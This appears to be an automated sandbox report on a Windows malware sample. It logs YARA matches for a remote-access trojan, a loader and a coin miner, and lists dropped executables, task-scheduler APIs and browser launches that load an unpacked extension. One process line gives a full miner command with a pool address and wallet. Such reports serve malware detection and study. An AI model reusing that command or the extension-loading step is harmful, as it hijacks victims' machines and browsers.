Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9B883FFA 1_2_00007FFD9B883FFA
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9B955C61 1_2_00007FFD9B955C61
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9BA4792D 1_2_00007FFD9BA4792D
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9BA47469 1_2_00007FFD9BA47469
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9BA37299 1_2_00007FFD9BA37299
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9BA3C9FB 1_2_00007FFD9BA3C9FB
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9BA3C231 1_2_00007FFD9BA3C231
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9BA3C985 1_2_00007FFD9BA3C985
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9BA3B1A0 1_2_00007FFD9BA3B1A0
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9BA4E8FA 1_2_00007FFD9BA4E8FA
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9BA3C126 1_2_00007FFD9BA3C126
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9BA3C6A0 1_2_00007FFD9BA3C6A0
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9BA415F9 1_2_00007FFD9BA415F9
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9BA4E5C7 1_2_00007FFD9BA4E5C7
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9BA3C4D3 1_2_00007FFD9BA3C4D3
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Code function: 2_2_000002A5B9B863BA 2_2_000002A5B9B863BA
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Code function: 2_2_000002A5B9B8678A 2_2_000002A5B9B8678A
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Code function: 2_2_000002A5B9B86BC2 2_2_000002A5B9B86BC2
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Code function: 2_2_000002A5B9B89E86 2_2_000002A5B9B89E86
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Code function: 2_2_000002A5B9B854DA 2_2_000002A5B9B854DA
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Code function: 2_2_000002A5B9B8762E 2_2_000002A5B9B8762E
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 468 -p 7508 -ip 7508
Source: Target.exe.0.dr Static PE information: No import functions for PE file found
Source: zlONcFaXkc.exe Static PE information: No import functions for PE file found
Source: zlONcFaXkc.exe, 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameLwbtkgrhgw.dll" vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9DD0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1666984608.000001DFA9511000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9994000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLwbtkgrhgw.dll" vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1680370592.000001DFC1F10000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB97BC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameLwbtkgrhgw.dll" vs zlONcFaXkc.exe
Source: zlONcFaXkc.exe Binary or memory string: OriginalFilenameZldnf.exe" vs zlONcFaXkc.exe
Source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.zlONcFaXkc.exe.1dfb97d41e0.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.zlONcFaXkc.exe.1dfb9894250.12.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.zlONcFaXkc.exe.1dfc1cb0000.14.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.zlONcFaXkc.exe.1dfb9814218.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.zlONcFaXkc.exe.1dfb9994288.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 20.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 20.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 20.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 1.2.Target.exe.1d0abdfaef0.0.unpack, type: UNPACKEDPE Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 1.2.Target.exe.1d0abdfaef0.0.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 1.2.Target.exe.1d0abdfaef0.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000002.00000002.2015231668.000002A5B9B80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000014.00000002.4110650202.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: Target.exe PID: 7384, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: AddInProcess.exe PID: 7492, type: MEMORYSTR Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: zlONcFaXkc.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Target.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.zlONcFaXkc.exe.1dfb9dd0178.9.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.zlONcFaXkc.exe.1dfc1f10000.16.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: classification engine Classification label: mal100.troj.evad.mine.winEXE@103/309@24/25
Source: C:\Users\user\Desktop\zlONcFaXkc.exe File created: C:\Users\user\AppData\Roaming\IsFixedSize
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Mutant created: \Sessions\1\BaseNamedObjects\cd738f7ec36d311b107bd6ec4b05793a
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Mutant created: \Sessions\1\BaseNamedObjects\444118017aca01d9d0dde7
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7508
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe File created: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe
Source: zlONcFaXkc.exe Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
Source: C:\Users\user\Desktop\zlONcFaXkc.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe File read: C:\Program Files\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: AddInProcess.exe String found in binary or memory: id-cmc-addExtensions
Source: AddInProcess.exe String found in binary or memory: set-addPolicy
Source: C:\Users\user\Desktop\zlONcFaXkc.exe File read: C:\Users\user\Desktop\zlONcFaXkc.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\zlONcFaXkc.exe "C:\Users\user\Desktop\zlONcFaXkc.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Process created: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe "C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe"
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 468 -p 7508 -ip 7508
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7508 -s 1516
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1988,i,7184690276915472336,9481308763283154706,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1924 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1964,i,18268589753722857029,6653790801772642783,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6680 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6956 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 185.196.10.233:35662 -u ZEPHs72fKDmidnGGBpgHXJHNdpe49PRJa1tvHRycwAPy9VLQpybiQf527biDskd3jSJyDZY5UbzexC3Fnoxu4rBvgyx1b5vnkJf.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s lfsvc
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7300 --field-trial-handle=2104,i,7062802444683946307,12372050884922623909,262144 /prefetch:8
